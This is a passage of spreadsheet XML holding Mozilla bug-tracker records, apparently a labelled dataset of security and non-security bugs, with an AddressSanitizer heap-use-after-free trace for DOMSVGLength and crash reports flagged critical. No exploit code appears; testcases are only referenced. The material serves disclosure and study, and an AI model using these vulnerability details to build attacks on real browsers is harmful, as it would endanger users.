      <c r="F4287" t="n">
        <v>1</v>
      </c>
      <c r="G4287" t="n">
        <v>3</v>
      </c>
      <c r="H4287" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4287" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4287" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K4287" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4287" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4287" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4287" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4287" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4287" t="inlineStr">
        <is>
          <t>[sg:critical?] needs r=bzbarsky</t>
        </is>
      </c>
      <c r="Q4287" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4287" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4287" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4287" t="n">
        <v>1</v>
      </c>
      <c r="U4287" t="n">
        <v>0</v>
      </c>
      <c r="V4287" t="n">
        <v>27</v>
      </c>
      <c r="W4287" t="inlineStr">
        <is>
          <t>Created attachment 319229
testcase (crashes Firefox when loaded)
Loading the testcase makes Firefox crash [@ nsListBoxBodyFrame::GetNextItemBox].</t>
        </is>
      </c>
      <c r="X4287" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4288">
      <c r="A4288" t="n">
        <v>631459</v>
      </c>
      <c r="B4288" t="inlineStr">
        <is>
          <t>2011-02-03 23:28:58 -0800</t>
        </is>
      </c>
      <c r="C4288" t="inlineStr">
        <is>
          <t>On Contributor Dashboard, option to watch for English reviews has wrong text</t>
        </is>
      </c>
      <c r="D4288" t="inlineStr">
        <is>
          <t>2011-03-31 15:47:09 -0700</t>
        </is>
      </c>
      <c r="E4288" t="n">
        <v>1</v>
      </c>
      <c r="F4288" t="n">
        <v>1</v>
      </c>
      <c r="G4288" t="n">
        <v>5</v>
      </c>
      <c r="H4288" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4288" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4288" t="inlineStr">
        <is>
          <t>Localization</t>
        </is>
      </c>
      <c r="K4288" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4288" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4288" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4288" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4288" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4288" t="inlineStr"/>
      <c r="Q4288" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4288" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4288" t="inlineStr">
        <is>
          <t>2011Q2</t>
        </is>
      </c>
      <c r="T4288" t="n">
        <v>1</v>
      </c>
      <c r="U4288" t="n">
        <v>0</v>
      </c>
      <c r="V4288" t="n">
        <v>7</v>
      </c>
      <c r="W4288" t="inlineStr">
        <is>
          <t>1. Go to /de/contributors.
2. There should be 3 links (actually form submits) in the right column talking about getting email notifications.
The last of these says, in German, "Get mailed when German articles are approved" but should say "Get mailed when English articles are approved".</t>
        </is>
      </c>
      <c r="X4288" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4289">
      <c r="A4289" t="n">
        <v>1135969</v>
      </c>
      <c r="B4289" t="inlineStr">
        <is>
          <t>2015-02-23 17:34:23 -0800</t>
        </is>
      </c>
      <c r="C4289" t="inlineStr">
        <is>
          <t>Thunderbird log retention of 24 hours is far too short</t>
        </is>
      </c>
      <c r="D4289" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E4289" t="n">
        <v>1</v>
      </c>
      <c r="F4289" t="n">
        <v>1</v>
      </c>
      <c r="G4289" t="n">
        <v>5</v>
      </c>
      <c r="H4289" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4289" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4289" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4289" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4289" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4289" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4289" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4289" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4289" t="inlineStr"/>
      <c r="Q4289" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4289" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4289" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4289" t="n">
        <v>1</v>
      </c>
      <c r="U4289" t="n">
        <v>0</v>
      </c>
      <c r="V4289" t="n">
        <v>10</v>
      </c>
      <c r="W4289" t="inlineStr">
        <is>
          <t>Doing anything about bug 1118175, so that we'll stop throwing actual failures in there just because they include the non-failure access denied message, requires being able to actually see the logs from Thunderbird jobs, but because we throw them away after 24 hours, unlike the 30 days we keep Firefox logs, so far nobody has ever been quick enough to actually see one.</t>
        </is>
      </c>
      <c r="X4289" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4290">
      <c r="A4290" t="n">
        <v>1018524</v>
      </c>
      <c r="B4290" t="inlineStr">
        <is>
          <t>2014-05-30 18:35:37 -0700</t>
        </is>
      </c>
      <c r="C4290" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::DOMSVGLength::GetTearOff</t>
        </is>
      </c>
      <c r="D4290" t="inlineStr">
        <is>
          <t>2024-05-30 08:34:59 -0700</t>
        </is>
      </c>
      <c r="E4290" t="n">
        <v>1</v>
      </c>
      <c r="F4290" t="n">
        <v>1</v>
      </c>
      <c r="G4290" t="n">
        <v>3</v>
      </c>
      <c r="H4290" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4290" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4290" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K4290" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4290" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4290" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4290" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4290" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4290" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q4290" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4290" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4290" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T4290" t="n">
        <v>1</v>
      </c>
      <c r="U4290" t="n">
        <v>0</v>
      </c>
      <c r="V4290" t="n">
        <v>58</v>
      </c>
      <c r="W4290" t="inlineStr">
        <is>
          <t>Created attachment 8432024
Testcase
Need fuzzPriv extension. https://www.squarefree.com/extensions/domFuzzLite3.xpi
==6521==ERROR: AddressSanitizer: heap-use-after-free on address 0x60700026a968 at pc 0x7f779d09e97a bp 0x7fff11d30870 sp 0x7fff11d30868
READ of size 8 at 0x60700026a968 thread T0
    #0 0x7f779d09e979 in mozilla::DOMSVGLength::GetTearOff(nsSVGLength2*, nsSVGElement*, bool) objdir-ff-asan/content/svg/content/src/../../../../dist/include/nsISupportsImpl.h:51
    #1 0x7f779d1e232f in nsSVGLength2::ToDOMAnimVal(mozilla::DOMSVGLength**, nsSVGElement*) content/svg/content/src/nsSVGLength2.cpp:336
    #2 0x7f779d108850 in mozilla::dom::SVGAnimatedLength::AnimVal() content/svg/content/src/SVGAnimatedLength.cpp:37
    #3 0x7f779b446989 in mozilla::dom::SVGAnimatedLengthBinding::get_animVal(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::SVGAnimatedLength*, JSJitGetterCallArgs) objdir-ff-asan/dom/bindings/./SVGAnimatedLengthBinding.cpp:48
    #4 0x7f779b95bdfc in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) dom/bindings/BindingUtils.cpp:2280
    #5 0x7f77a06bd843 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
    #6 0x7f77a0659b1e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
    #7 0x7f77a06bf5fd in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:603
    #8 0x7f77a04799ff in js::baseops::GetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Shape-inl.h:46
    #9 0x7f77a06b0e19 in Interpret(JSContext*, js::RunState&amp;) js/src/jsobj.h:984
    #10 0x7f77a069615c in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:422
    #11 0x7f77a06bdd91 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:494
    #12 0x7f77a0659b1e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
    #13 0x7f77a034bdb5 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:5214
    #14 0x7f779ad89131 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/bindings/./EventHandlerBinding.cpp:35
    #15 0x7f779c2a96ef in JS::Value mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) objdir-ff-asan/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:62
    #16 0x7f779c2a7c0f in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) dom/events/JSEventHandler.cpp:214
    #17 0x7f779c2767d0 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:950
    #18 0x7f779c277b40 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1011
    #19 0x7f779c268a01 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:287
    #20 0x7f779c26cb26 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
    #21 0x7f779d7ad394 in nsDocumentViewer::LoadComplete(tag_nsresult) layout/base/nsDocumentViewer.cpp:1004
    #22 0x7f779e42970b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult) docshell/base/nsDocShell.cpp:6963
    #23 0x7f779e426899 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) docshell/base/nsDocShell.cpp:6762
    #24 0x7f779e426cff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) docshell/base/nsDocShell.cpp:6769
    #25 0x7f779a2d0abb in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult) uriloader/base/nsDocLoader.cpp:1268
    #26 0x7f779a2cfe02 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) uriloader/base/nsDocLoader.cpp:850
    #27 0x7f779a2cd9a3 in nsDocLoader::DocLoaderIsEmpty(bool) uriloader/base/nsDocLoader.cpp:740
    #28 0x7f779a2cf202 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) uriloader/base/nsDocLoader.cpp:624
    #29 0x7f779a2cf8ac in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) objdir-ff-asan/uriloader/base/Unified_cpp_uriloader_base0.cpp:628
    #30 0x7f77991dda38 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsLoadGroup.cpp:689
    #31 0x7f779c85397c in nsDocument::DoUnblockOnload() content/base/src/nsDocument.cpp:8706
    #32 0x7f779c85362a in nsDocument::UnblockOnload(bool) content/base/src/nsDocument.cpp:8634
    #33 0x7f779c8288c8 in nsDocument::DispatchContentLoadedEvents() content/base/src/nsDocument.cpp:4917
    #34 0x7f779c878da0 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), void, true&gt;::Run() objdir-ff-asan/content/base/src/../../../dist/include/nsThreadUtils.h:387
    #35 0x7f77990765b5 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:766
    #36 0x7f7798f3622a in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
    #37 0x7f77998704a9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
    #38 0x7f7799818920 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:229
    #39 0x7f779bb979d7 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
    #40 0x7f779ea75628 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:278
    #41 0x7f779e8ef0d3 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4012
    #42 0x7f779e8effaf in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4081
    #43 0x7f779e8f0dfd in XRE_main toolkit/xre/nsAppRunner.cpp:4293
    #44 0x48c757 in main browser/app/nsBrowserApp.cpp:282
    #45 0x7f77a79d1de4 in __libc_start_main /build/buildd/eglibc-2.17/csu/libc-start.c:260
0x60700026a968 is located 40 bytes inside of 80-byte region [0x60700026a940,0x60700026a990)
freed by thread T0 here:
    #0 0x473bf1 in __interceptor_free _asan_rtl_
    #1 0x7f7798f87d1a in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2611
    #2 0x7f7798f87929 in nsCycleCollector::FreeSnowWhite(bool) xpcom/base/nsCycleCollector.cpp:2778
    #3 0x7f7798f8d67f in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3705
    #4 0x7f7798f8cdb6 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3546
    #5 0x7f7798f90d0c in nsCycleCollector_collect(nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:4127
    #6 0x7f779c049263 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) dom/base/nsJSEnvironment.cpp:1943
    #7 0x7f779c04895f in nsJSEnvironmentObserver::Observe(nsISupports*, char const*, char16_t const*) dom/base/nsJSEnvironment.cpp:283
    #8 0x7f7798fd7329 in nsObserverService::NotifyObservers(nsISupports*, char const*, char16_t const*) xpcom/ds/nsObserverList.cpp:96
    #9 0x7f779908b331 in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #10 0x7f779bd882c7 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:2395
    #11 0x7f779bd8e0ae in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1273
    #12 0x7f77a06bd843 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
    #13 0x7f77a06b1774 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2581
    #14 0x7f77a069615c in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:422
    #15 0x7f77a06bdd91 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:494
    #16 0x7f77a03ca040 in js::CallOrConstructBoundFunction(JSContext*, unsigned int, JS::Value*) js/src/jsfun.cpp:1401
    #17 0x7f77a06bd843 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
    #18 0x7f77a0659b1e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
    #19 0x7f77a05ba765 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:448
    #20 0x7f77a0538195 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2663
    #21 0x7f77a053e354 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3066
    #22 0x7f77a06bd843 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
    #23 0x7f77a06b1774 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2581
    #24 0x7f77a069615c in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:422
    #25 0x7f77a06bdd91 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:494
    #26 0x7f77a0659b1e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
    #27 0x7f77a034bdb5 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:5214
    #28 0x7f779ad89131 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/bindings/./EventHandlerBinding.cpp:35
    #29 0x7f779c2a96ef in JS::Value mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) objdir-ff-asan/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:62
previously allocated by thread T0 here:
    #0 0x473df1 in malloc _asan_rtl_
    #1 0x7f77a3bc6a4d in moz_xmalloc memory/mozalloc/mozalloc.cpp:52
    #2 0x7f779d09e654 in mozilla::DOMSVGLength::GetTearOff(nsSVGLength2*, nsSVGElement*, bool) objdir-ff-asan/content/svg/content/src/../../../../dist/include/mozilla/mozalloc.h:201
    #3 0x7f779d1e232f in nsSVGLength2::ToDOMAnimVal(mozilla::DOMSVGLength**, nsSVGElement*) content/svg/content/src/nsSVGLength2.cpp:336
    #4 0x7f779d108850 in mozilla::dom::SVGAnimatedLength::AnimVal() content/svg/content/src/SVGAnimatedLength.cpp:37
    #5 0x7f779b446989 in mozilla::dom::SVGAnimatedLengthBinding::get_animVal(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::SVGAnimatedLength*, JSJitGetterCallArgs) objdir-ff-asan/dom/bindings/./SVGAnimatedLengthBinding.cpp:48
    #6 0x7f779b95bdfc in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) dom/bindings/BindingUtils.cpp:2280
    #7 0x7f77a06bd843 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
    #8 0x7f77a0659b1e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
    #9 0x7f77a06bf5fd in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:603
    #10 0x7f77a04799ff in js::baseops::GetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Shape-inl.h:46
    #11 0x7f77a06b0e19 in Interpret(JSContext*, js::RunState&amp;) js/src/jsobj.h:984
    #12 0x7f77a069615c in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:422
    #13 0x7f77a06bdd91 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:494
    #14 0x7f77a0659b1e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
    #15 0x7f77a034bdb5 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:5214
    #16 0x7f779ad89131 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/bindings/./EventHandlerBinding.cpp:35
    #17 0x7f779c2a96ef in JS::Value mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) objdir-ff-asan/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:62
    #18 0x7f779c2a7c0f in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) dom/events/JSEventHandler.cpp:214
    #19 0x7f779c2767d0 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:950
    #20 0x7f779c277b40 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1011
    #21 0x7f779c268a01 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:287
    #22 0x7f779c26cb26 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
    #23 0x7f779d7ad394 in nsDocumentViewer::LoadComplete(tag_nsresult) layout/base/nsDocumentViewer.cpp:1004
    #24 0x7f779e42970b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult) docshell/base/nsDocShell.cpp:6963
    #25 0x7f779e426899 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) docshell/base/nsDocShell.cpp:6762
    #26 0x7f779e426cff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) docshell/base/nsDocShell.cpp:6769
    #27 0x7f779a2d0abb in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult) uriloader/base/nsDocLoader.cpp:1268
    #28 0x7f779a2cfe02 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) uriloader/base/nsDocLoader.cpp:850
    #29 0x7f779a2cd9a3 in nsDocLoader::DocLoaderIsEmpty(bool) uriloader/base/nsDocLoader.cpp:740
SUMMARY: AddressSanitizer: heap-use-after-free ??:0 ??
Shadow bytes around the buggy address:
  0x0c0e800454d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e800454e0: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0e800454f0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa 00 00
  0x0c0e80045500: 00 00 00 00 00 00 00 00 fa fa fa fa fd fd fd fd
  0x0c0e80045510: fd fd fd fd fd fd fa fa fa fa fd fd fd fd fd fd
=&gt;0x0c0e80045520: fd fd fd fd fa fa fa fa fd fd fd fd fd[fd]fd fd
  0x0c0e80045530: fd fd fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
  0x0c0e80045540: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
  0x0c0e80045550: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0e80045560: fd fd fd fd fd fd fd fd fd fd fa fa fa fa 00 00
  0x0c0e80045570: 00 00 00 00 00 00 00 00 fa fa fa fa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6521==ABORTING</t>
        </is>
      </c>
      <c r="X4290" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4291">
      <c r="A4291" t="n">
        <v>514554</v>
      </c>
      <c r="B4291" t="inlineStr">
        <is>
          <t>2009-09-03 15:35:41 -0700</t>
        </is>
      </c>
      <c r="C4291" t="inlineStr">
        <is>
          <t>Crash with recursive web-worker calls [@XPCNativeSet::Mark]</t>
        </is>
      </c>
      <c r="D4291" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E4291" t="n">
        <v>1</v>
      </c>
      <c r="F4291" t="n">
        <v>1</v>
      </c>
      <c r="G4291" t="n">
        <v>3</v>
      </c>
      <c r="H4291" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4291" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4291" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4291" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4291" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4291" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4291" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4291" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4291" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4291" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4291" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4291" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T4291" t="n">
        <v>1</v>
      </c>
      <c r="U4291" t="n">
        <v>0</v>
      </c>
      <c r="V4291" t="n">
        <v>40</v>
      </c>
      <c r="W4291" t="inlineStr">
        <is>
          <t>Created attachment 398496
testcase (open either of the two index files)
Orlando Berrera from sectheory.com sent me this testcase, a variant (likely the original) was posted by Malloc(i) at http://sla.ckers.org/forum/read.php?14,30128 so this is a public crash.
Orlando and Malloci report this as a DoS, a near-null read access violation. When I tried it I saw a few scarier and suspicious things, a near-null write access violation due to an integer overflow (reading from 8 + register containing 0xffffffff), crashes in GC, and crashes in the cycle collector.
I'm not at all sure web workers are a required part of this testcase. Would we get the same results appending to the document in a simple setInterval() ? This testcase seems to crash faster than I'd expect that approach to, but maybe that's just because the threads can generate events while layout is reflowing instead of having to wait for it.</t>
        </is>
      </c>
      <c r="X4291" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4292">
      <c r="A4292" t="n">
        <v>134793</v>
      </c>
      <c r="B4292" t="inlineStr">
        <is>
          <t>2002-04-01 21:21:42 -0800</t>
        </is>
      </c>
      <c r="C4292" t="inlineStr">
        <is>
